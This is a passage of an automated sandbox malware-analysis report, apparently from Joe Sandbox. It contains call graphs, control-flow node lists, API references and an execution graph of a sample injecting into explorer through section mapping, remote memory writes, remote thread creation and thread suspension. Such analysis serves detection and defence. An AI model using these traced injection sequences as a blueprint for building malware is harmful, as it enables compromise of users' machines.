                                                                                            callgraph 0 Function_00CB36C8 19 Function_00CB18E8 0->19 25 Function_00CB1860 0->25 29 Function_00CB21E4 0->29 66 Function_00CB1B14 0->66 1 Function_00CB234C 2 Function_00CB1A4C 3 Function_00CB9FC2 4 Function_00CB1C40 5 Function_00CB2340 6 Function_00CB29C0 43 Function_00CB2688 6->43 7 Function_00CB2BC0 18 Function_00CB2A54 7->18 7->25 7->43 52 Function_00CB2700 7->52 65 Function_00CB2610 7->65 73 Function_00CB272C 7->73 82 Function_00CB1838 7->82 83 Function_00CB1938 7->83 8 Function_00CB9ADA 9 Function_00CBA25A 10 Function_00CB3458 10->6 10->10 13 Function_00CB3254 10->13 10->25 39 Function_00CB2774 10->39 10->43 10->52 76 Function_00CB28A0 10->76 10->82 11 Function_00CB18D0 12 Function_00CBA055 13->25 13->43 46 Function_00CB298C 13->46 68 Function_00CB30A8 13->68 13->73 81 Function_00CB2938 13->81 13->82 14 Function_00CB2354 15 Function_00CB1AD4 16 Function_00CB14D4 17 Function_00CB1254 18->25 18->82 20 Function_00CB22E8 21 Function_00CB3668 21->10 22 Function_00CB156C 23 Function_00CB2B6C 57 Function_00CB2498 23->57 67 Function_00CB2514 23->67 24 Function_00CBA1E0 56 Function_00CBA298 24->56 25->15 26 Function_00CB1DE0 26->2 27 Function_00CB1560 28 Function_00CB2360 29->25 78 Function_00CB1E20 29->78 29->82 30 Function_00CBA1F9 30->56 31 Function_00CB14F9 32 Function_00CB18F8 33 Function_00CB2AF8 33->82 34 Function_00CB2EF8 34->65 35 Function_00CB2F7C 35->7 35->18 35->25 35->34 54 Function_00CB2E04 35->54 36 Function_00CB23F0 72 Function_00CB23AC 36->72 37 Function_00CB2570 37->14 77 Function_00CB23A0 37->77 37->82 38 Function_00CB1576 39->25 39->39 39->82 40 Function_00CB37F4 40->0 40->14 40->20 40->23 40->37 42 Function_00CB2308 40->42 70 Function_00CB372C 40->70 71 Function_00CB22AC 40->71 88 Function_00CB22B4 40->88 41 Function_00CB1508 43->82 44 Function_00CB3608 44->10 45 Function_00CBB00C 47 Function_00CB1B8C 47->82 48 Function_00CB188C 48->82 49 Function_00CB4001 50 Function_00CB1980 51 Function_00CB1000 52->25 52->43 53 Function_00CB1405 54->25 54->47 54->82 55 Function_00CB4019 56->9 57->5 57->72 58 Function_00CB141D 59 Function_00CB971C 60 Function_00CB9912 61 Function_00CB9C92 62 Function_00CB4011 63 Function_00CB1D10 63->32 63->82 64 Function_00CB2410 64->36 64->72 65->82 66->82 67->1 67->14 67->28 67->36 67->77 68->25 68->33 68->35 68->43 68->52 68->68 68->73 69 Function_00CBA1AF 69->56 70->25 70->82 74 Function_00CB1822 75 Function_00CB4021 76->25 76->39 76->82 78->4 78->11 78->25 78->26 78->32 78->48 78->50 78->63 78->82 79 Function_00CB99A7 80 Function_00CB47A7 84 Function_00CB14B2 85 Function_00CB9930 86 Function_00CB38B0 86->15 86->82 86->86 87 Function_00CB9EB4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 184 cb30a8-cb30e3 call cb2688 call cb272c 189 cb30ec-cb3111 call cb2688 FindFirstFileW 184->189 190 cb30e5-cb30e6 184->190 193 cb3237-cb3252 call cb1860 * 2 189->193 194 cb3117-cb3118 189->194 190->189 195 cb311f-cb3124 194->195 197 cb312a-cb313e 195->197 198 cb31ad-cb31df call cb2688 call cb2700 195->198 205 cb3210-cb3220 FindNextFileW 197->205 206 cb3144-cb3158 197->206 214 cb3208-cb320b call cb1860 198->214 215 cb31e1-cb31eb call cb2af8 198->215 205->195 208 cb3226-cb3230 FindClose 205->208 206->205 211 cb315e-cb316b call cb272c 206->211 208->193 219 cb316d-cb3174 211->219 220 cb3176 211->220 214->205 215->214 223 cb31ed-cb3203 call cb2f7c 215->223 222 cb3178-cb31a8 call cb2688 call cb2700 call cb30a8 call cb1860 219->222 220->222 222->198 223->214
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                            • Instruction ID: cd3e30133068fc239415bd66e3371249e6aacd25d82231720aa6b30b86d488ae
                                                                                            • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                            • Instruction Fuzzy Hash: 00416F30318B4C4FDB94FB3898597EE73E6FBD8341F444A29A45AC3191EE78DA049782

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 239 cb38b0-cb3907 call cb1ad4 call cb1838 NtUnmapViewOfSection call cb388c 248 cb3909-cb390c call cb38b0 239->248 249 cb3911-cb391a 239->249 248->249
                                                                                            APIs
                                                                                            • NtUnmapViewOfSection.NTDLL ref: 00CB38F2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 498011366-0
                                                                                            • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                            • Instruction ID: 2a853d751e5ae81adbf1a8f4ec092aca19b555c0b8196492deee25264f2c96bf
                                                                                            • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                            • Instruction Fuzzy Hash: 82F0E520F11A481BEF6C77FD689D3B92284EB98311F90052AB925C32D2DC3A8E458302

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE ref: 00CB27C7
                                                                                            • RegQueryValueExW.KERNELBASE ref: 00CB27F4
                                                                                            • RegQueryValueExW.KERNELBASE ref: 00CB283A
                                                                                            • RegCloseKey.KERNELBASE ref: 00CB2860
                                                                                              • Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$CloseFreeHeapOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1641618270-0
                                                                                            • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                            • Instruction ID: 76458921b39179fc788f0059506b451923e869760162f0472a3e420c492e0518
                                                                                            • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                            • Instruction Fuzzy Hash: CA31C53120CB488FE769DB28D4587BA7BD0FBA8355F54062EE49AC22A4DF35C9428742

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 22 cb372c-cb37ba call cb1838 RegCreateKeyExW 26 cb37bc-cb37cb RegCloseKey 22->26 27 cb37d6-cb37f0 call cb1860 22->27 26->27 28 cb37cd-cb37d3 26->28 28->27
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreate
                                                                                            • String ID: ?
                                                                                            • API String ID: 2932200918-1684325040
                                                                                            • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                            • Instruction ID: 516aff987ee5d6356bf8a7f2c00fbf37a0e460ed406e1fd2f900f50b0ffe00d9
                                                                                            • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                            • Instruction Fuzzy Hash: E1119070608B488FD751DF29D48866AB7E1FB98305F50062EE48AC3260DF389985CB82

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 31 cba298-cba29b 32 cba2a5-cba2a9 31->32 33 cba2ab-cba2b3 32->33 34 cba2b5 32->34 33->34 35 cba29d-cba2a3 34->35 36 cba2b7 34->36 35->32 37 cba2ba-cba2c1 36->37 39 cba2cd 37->39 40 cba2c3-cba2cb 37->40 39->37 41 cba2cf-cba2d2 39->41 40->39 42 cba2e7-cba2f4 41->42 43 cba2d4-cba2e2 41->43 55 cba30e-cba31c call cba25a 42->55 56 cba2f6-cba2f8 42->56 44 cba31e-cba339 43->44 45 cba2e4-cba2e5 43->45 46 cba36a-cba36d 44->46 45->42 48 cba36f-cba370 46->48 49 cba372-cba379 46->49 52 cba351-cba355 48->52 50 cba37f-cba383 49->50 53 cba3e0-cba3e9 50->53 54 cba385-cba39e LoadLibraryA 50->54 57 cba33b-cba33e 52->57 58 cba357-cba35a 52->58 64 cba3ec-cba3f5 53->64 60 cba39f-cba3a6 54->60 55->32 62 cba2fb-cba302 56->62 57->49 61 cba340 57->61 58->49 63 cba35c-cba360 58->63 60->50 66 cba3a8 60->66 67 cba341-cba345 61->67 81 cba30c 62->81 82 cba304-cba30a 62->82 63->67 68 cba362-cba369 63->68 69 cba41a-cba46a VirtualProtect * 2 64->69 70 cba3f7-cba3f9 64->70 72 cba3aa-cba3b2 66->72 73 cba3b4-cba3bc 66->73 67->52 74 cba347-cba349 67->74 68->46 71 cba46e-cba473 69->71 76 cba3fb-cba40a 70->76 77 cba40c-cba418 70->77 71->71 78 cba475-cba484 71->78 79 cba3be-cba3ca 72->79 73->79 74->52 80 cba34b-cba34f 74->80 76->64 77->76 85 cba3cc-cba3d3 79->85 86 cba3d5-cba3df 79->86 80->52 80->58 81->55 81->62 82->81 85->60
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE ref: 00CBA397
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CBA441
                                                                                            • VirtualProtect.KERNELBASE ref: 00CBA45F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB9000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb9000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 895956442-0
                                                                                            • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                            • Instruction ID: b93970d0dc29107a8e5d429b83dc1bbbd1fff062bac464bcfb584069b83ce673
                                                                                            • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                            • Instruction Fuzzy Hash: DB51673275891D4BCB24AB7C98C43F5B3C1F769321F58062AC4EAC3294E959D9468383

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 87 cb3254-cb3287 call cb298c 90 cb343a-cb3456 87->90 91 cb328d-cb3297 call cb298c 87->91 91->90 94 cb329d-cb32aa call cb272c 91->94 97 cb32ac-cb32b3 94->97 98 cb32b5 94->98 99 cb32b7-cb32c2 call cb2688 97->99 98->99 102 cb32c8-cb32fe call cb2688 call cb1838 * 2 call cb2938 99->102 103 cb342c-cb3435 call cb30a8 99->103 113 cb340c-cb3427 call cb1860 * 4 102->113 114 cb3304-cb3318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 116 cb331e-cb3326 114->116 116->113 118 cb332c-cb332f 116->118 118->113 120 cb3335-cb3348 118->120 124 cb334e-cb3377 GetPrivateProfileStringW 120->124 125 cb33f0-cb3406 120->125 124->125 127 cb3379-cb3398 GetPrivateProfileIntW 124->127 125->113 125->118 130 cb339a-cb33ad call cb2688 127->130 131 cb33e5-cb33eb call cb30a8 127->131 135 cb33af-cb33b3 130->135 136 cb33c6-cb33e3 call cb30a8 call cb1860 130->136 131->125 137 cb33bd-cb33c4 135->137 138 cb33b5-cb33ba 135->138 136->125 137->135 137->136 138->137
                                                                                            APIs
                                                                                              • Part of subcall function 00CB298C: GetFileAttributesW.KERNELBASE ref: 00CB299E
                                                                                            • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CB330F
                                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 00CB336F
                                                                                            • GetPrivateProfileIntW.KERNEL32 ref: 00CB338C
                                                                                              • Part of subcall function 00CB30A8: FindFirstFileW.KERNELBASE ref: 00CB3104
                                                                                              • Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                            • String ID:
                                                                                            • API String ID: 970345848-0
                                                                                            • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                            • Instruction ID: e3f3ac39ceda46df808ea7ffd7ee7a9f9e448b01809780a81d8aaf39cb50b2d8
                                                                                            • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                            • Instruction Fuzzy Hash: A751EE30718F494FDB19B72C68166BE33D1FB98300F44056EE40AC7296EE64DE468786

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • StrStrIW.KERNELBASE ref: 00CB347E
                                                                                            • RegOpenKeyExW.KERNELBASE ref: 00CB353F
                                                                                            • RegEnumKeyExW.KERNELBASE ref: 00CB35D6
                                                                                              • Part of subcall function 00CB2774: RegOpenKeyExW.KERNELBASE ref: 00CB27C7
                                                                                              • Part of subcall function 00CB2774: RegQueryValueExW.KERNELBASE ref: 00CB27F4
                                                                                              • Part of subcall function 00CB2774: RegQueryValueExW.KERNELBASE ref: 00CB283A
                                                                                              • Part of subcall function 00CB2774: RegCloseKey.KERNELBASE ref: 00CB2860
                                                                                              • Part of subcall function 00CB3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CB330F
                                                                                              • Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                            • String ID:
                                                                                            • API String ID: 1841478724-0
                                                                                            • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                            • Instruction ID: e4b67799794fa15fe01e31d62b29507cd695e07b874b9341e16211c8904e156c
                                                                                            • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                            • Instruction Fuzzy Hash: 34417C30718F4C4FDBA8EF6D94997AAB6E1FB98341F44056EA54EC32A1DE34D9048B42

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 232 cb2938-cb2943 233 cb2945-cb2948 232->233 234 cb2984 232->234 233->234 235 cb294a-cb2970 CreateFileW 233->235 236 cb2986-cb298b 234->236 237 cb2972-cb297a CloseHandle 235->237 238 cb2980-cb2982 235->238 237->238 238->236
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3498533004-0
                                                                                            • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                            • Instruction ID: bf702346a4df55701551d3b4ad994711cbd7bb84de3174160d8bff0299a5493c
                                                                                            • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                            • Instruction Fuzzy Hash: D2F02B7061570A4FE7446FB94498376B5D0FB08397F18473DE46EC62D0D73489428702

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 251 cb22b4-cb22c6 252 cb22c8-cb22d0 CreateStreamOnHGlobal 251->252 253 cb22d6-cb22e6 251->253 252->253
                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE ref: 00CB22D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateGlobalStream
                                                                                            • String ID:
                                                                                            • API String ID: 2244384528-0
                                                                                            • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                            • Instruction ID: 4feec456ba4181d6b839b912b6121ee74de514bb34a8f94cea68afb8c8b8374e
                                                                                            • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                            • Instruction Fuzzy Hash: FAE0C230108B0A8FD758AFBCE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 254 cb298c-cb2997 255 cb2999-cb299c 254->255 256 cb29b5 254->256 255->256 258 cb299e-cb29a7 GetFileAttributesW 255->258 257 cb29b7-cb29bc 256->257 259 cb29a9-cb29af 258->259 260 cb29b1-cb29b3 258->260 259->260 260->257
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE ref: 00CB299E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                            • Instruction ID: 3dbd09c393f715283cde4be171ecee418388c4218ac6fb4d77066ea31b502e33
                                                                                            • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                            • Instruction Fuzzy Hash: A0D0A722F32905077B6426FA08DD2F130A0D71932AF14033AEB3EC11E0E285CED5A201

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 261 cb1860-cb1870 call cb1ad4 264 cb1872-cb1880 RtlFreeHeap 261->264 265 cb1886-cb188b 261->265 264->265
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                            • Instruction ID: 0946abe1e520979cae27cdedbce2dd1f4ae0c99a73809e3a3e127034fae1c452
                                                                                            • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                            • Instruction Fuzzy Hash: F7D01224716A040BEF2CBBFA1C9D1B47AD6E758212F5D8065BC19C3291DD3AD895D341

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.3%
                                                                                            Dynamic/Decrypted Code Coverage:97.4%
                                                                                            Signature Coverage:27.5%
                                                                                            Total number of Nodes:306
                                                                                            Total number of Limit Nodes:42
                                                                                            execution_graph 708 197728 709 197904 708->709 710 19774b 708->710 709->709 711 19785a LoadLibraryA 710->711 715 19789f VirtualProtect VirtualProtect 710->715 712 197871 711->712 712->710 714 197883 GetProcAddress 712->714 714->712 716 197899 714->716 715->709 993 19245e lstrlen 994 1924a5 993->994 995 192476 CryptBinaryToStringA 993->995 995->994 996 192489 995->996 999 192861 GetProcessHeap RtlAllocateHeap 996->999 998 192494 CryptBinaryToStringA 998->994 999->998 717 191000 718 191010 717->718 719 191007 717->719 721 191016 719->721 771 192608 VirtualQuery 721->771 724 191097 724->718 726 19102c RtlMoveMemory 727 19104d 726->727 728 191071 GetCurrentProcessId 726->728 808 192861 GetProcessHeap RtlAllocateHeap 727->808 732 19109e 728->732 733 191092 728->733 730 191052 RtlMoveMemory 730->728 774 1910a4 732->774 733->724 734 191095 733->734 809 191332 734->809 736 1910a3 738 192861 GetProcessHeap RtlAllocateHeap 736->738 739 1910cc 738->739 740 1910dc CreateToolhelp32Snapshot 739->740 741 1910f0 Process32First 740->741 742 191322 Sleep 740->742 743 19131b CloseHandle 741->743 744 19110c lstrcmpiA 741->744 742->740 743->742 745 191124 lstrcmpiA 744->745 750 191280 744->750 746 191138 lstrcmpiA 745->746 745->750 748 19114c lstrcmpiA 746->748 746->750 747 1925ad OpenProcess IsWow64Process IsWow64Process CloseHandle 747->750 749 191160 lstrcmpiA 748->749 748->750 749->750 752 191170 lstrcmpiA 749->752 750->747 751 191305 Process32Next 750->751 760 192608 VirtualQuery 750->760 762 1912ae lstrcmpiA 750->762 767 191819 30 API calls 750->767 751->744 753 191319 751->753 752->750 754 191184 lstrcmpiA 752->754 753->743 754->750 755 191198 lstrcmpiA 754->755 755->750 756 1911ac lstrcmpiA 755->756 756->750 757 1911c0 lstrcmpiA 756->757 757->750 758 1911d4 lstrcmpiA 757->758 758->750 759 1911e8 lstrcmpiA 758->759 759->750 761 1911fc lstrcmpiA 759->761 760->750 761->750 763 19120c lstrcmpiA 761->763 762->750 763->750 764 19121c lstrcmpiA 763->764 764->750 765 19122c lstrcmpiA 764->765 765->750 766 19123c lstrcmpiA 765->766 766->750 768 19124c lstrcmpiA 766->768 767->750 768->750 769 19125c lstrcmpiA 768->769 769->750 770 19126c lstrcmpiA 769->770 770->750 770->751 772 19101e 771->772 772->724 773 192861 GetProcessHeap RtlAllocateHeap 772->773 773->726 836 192861 GetProcessHeap RtlAllocateHeap 774->836 776 1910cc 777 1910dc CreateToolhelp32Snapshot 776->777 778 1910f0 Process32First 777->778 779 191322 Sleep 777->779 780 19131b CloseHandle 778->780 781 19110c lstrcmpiA 778->781 779->777 780->779 782 191280 781->782 783 191124 lstrcmpiA 781->783 788 191305 Process32Next 782->788 797 192608 VirtualQuery 782->797 799 1912ae lstrcmpiA 782->799 837 1925ad OpenProcess 782->837 843 191819 782->843 783->782 784 191138 lstrcmpiA 783->784 784->782 786 19114c lstrcmpiA 784->786 786->782 787 191160 lstrcmpiA 786->787 787->782 789 191170 lstrcmpiA 787->789 788->781 790 191319 788->790 789->782 791 191184 lstrcmpiA 789->791 790->780 791->782 792 191198 lstrcmpiA 791->792 792->782 793 1911ac lstrcmpiA 792->793 793->782 794 1911c0 lstrcmpiA 793->794 794->782 795 1911d4 lstrcmpiA 794->795 795->782 796 1911e8 lstrcmpiA 795->796 796->782 798 1911fc lstrcmpiA 796->798 797->782 798->782 800 19120c lstrcmpiA 798->800 799->782 800->782 801 19121c lstrcmpiA 800->801 801->782 802 19122c lstrcmpiA 801->802 802->782 803 19123c lstrcmpiA 802->803 803->782 805 19124c lstrcmpiA 803->805 805->782 806 19125c lstrcmpiA 805->806 806->782 807 19126c lstrcmpiA 806->807 807->782 807->788 808->730 889 192861 GetProcessHeap RtlAllocateHeap 809->889 811 191340 GetModuleFileNameA 890 192861 GetProcessHeap RtlAllocateHeap 811->890 813 191357 GetCurrentProcessId wsprintfA 891 19263e CryptAcquireContextA 813->891 816 19140d 914 192843 816->914 817 19139c Sleep 896 1924d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 817->896 820 1913ae GetModuleHandleA GetProcAddress 822 1913c9 820->822 823 1913da GetModuleHandleA GetProcAddress 820->823 904 191de3 822->904 826 1913f5 823->826 827 191406 823->827 824 192843 3 API calls 828 19141b RtlExitUserThread 824->828 829 191de3 3 API calls 826->829 830 1924d5 10 API calls 827->830 832 191425 828->832 829->827 830->816 831 19144b 831->732 832->831 833 192608 VirtualQuery 832->833 834 19143a 833->834 834->831 919 191493 834->919 836->776 838 1925cb IsWow64Process 837->838 839 192600 837->839 840 1925dc IsWow64Process 838->840 841 1925ee 838->841 839->782 840->841 842 1925f9 CloseHandle 840->842 841->842 842->839 844 192608 VirtualQuery 843->844 845 191833 844->845 846 191845 OpenProcess 845->846 847 191a76 845->847 846->847 848 19185e 846->848 847->782 849 192608 VirtualQuery 848->849 850 191865 849->850 850->847 851 19188f 850->851 852 191873 NtSetInformationProcess 850->852 874 191a80 851->874 852->851 855 191a80 2 API calls 856 1918d6 855->856 857 191a73 CloseHandle 856->857 858 191a80 2 API calls 856->858 857->847 859 191900 858->859 880 191b17 859->880 862 191a80 2 API calls 863 191930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 862->863 864 191a4e CreateRemoteThread 863->864 865 191985 863->865 866 191a65 CloseHandle 864->866 867 19198b CreateMutexA GetLastError 865->867 870 1919bb GetModuleHandleA GetProcAddress ReadProcessMemory 865->870 868 191a67 CloseHandle CloseHandle 866->868 867->865 869 1919a7 CloseHandle Sleep 867->869 868->857 869->867 871 1919ec WriteProcessMemory 870->871 872 191a47 870->872 871->872 873 191a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 871->873 872->866 872->868 873->872 875 191a94 874->875 878 1918b4 874->878 876 191aa4 NtCreateSection 875->876 877 191ac3 875->877 876->877 877->878 879 191ad8 NtMapViewOfSection 877->879 878->855 879->878 881 191b2e 880->881 882 191b60 880->882 883 191b30 RtlMoveMemory 881->883 884 191bc3 882->884 887 191b71 LoadLibraryA 882->887 888 191ba1 GetProcAddress 882->888 883->882 883->883 885 191910 NtUnmapViewOfSection 884->885 886 191be1 LdrProcessRelocationBlock 884->886 885->862 886->884 886->885 887->882 887->885 888->882 888->885 889->811 890->813 892 191384 CreateMutexA GetLastError 891->892 893 192664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 891->893 892->816 892->817 894 1926aa wsprintfA 893->894 894->894 895 1926cc CryptDestroyHash CryptReleaseContext 894->895 895->892 897 192515 896->897 898 192565 CloseHandle 897->898 899 192555 Thread32Next 897->899 900 192521 OpenThread 897->900 898->820 899->897 901 19253c SuspendThread 900->901 902 192544 ResumeThread 900->902 903 19254a CloseHandle 901->903 902->903 903->899 905 191e56 904->905 906 191ded 904->906 905->823 906->905 946 191e93 VirtualProtect 906->946 908 191e04 908->905 947 192815 VirtualAlloc 908->947 910 191e10 911 191e2d 910->911 912 191e1a RtlMoveMemory 910->912 948 191e93 VirtualProtect 911->948 912->911 915 192608 VirtualQuery 914->915 916 19284b 915->916 917 191414 916->917 918 19284f GetProcessHeap HeapFree 916->918 917->824 918->917 920 1914a1 919->920 921 1914c0 919->921 949 1917c7 920->949 923 1914c8 921->923 924 191510 921->924 926 1917c7 5 API calls 923->926 942 1914b6 923->942 968 1926e6 lstrlen lstrlen 924->968 928 1914e0 926->928 928->942 956 191647 928->956 929 19155f 930 1926e6 2 API calls 929->930 933 19156c 930->933 932 191532 970 191752 GetModuleHandleA GetProcAddress 932->970 935 1915a0 933->935 936 191584 933->936 933->942 941 192404 5 API calls 935->941 935->942 973 192404 lstrlen 936->973 939 191647 11 API calls 939->942 943 1915ac 941->943 942->831 943->942 944 191647 11 API calls 943->944 945 1914fb 944->945 945->942 979 1915e0 945->979 946->908 947->910 948->905 950 1917d1 949->950 951 191812 949->951 950->951 952 1926e6 2 API calls 950->952 951->942 953 1917f1 952->953 953->951 984 192861 GetProcessHeap RtlAllocateHeap 953->984 955 191804 RtlMoveMemory 955->951 957 191660 956->957 967 191745 956->967 958 191671 lstrlen 957->958 957->967 959 191683 lstrlen 958->959 958->967 960 191690 getpeername 959->960 959->967 961 1916ae 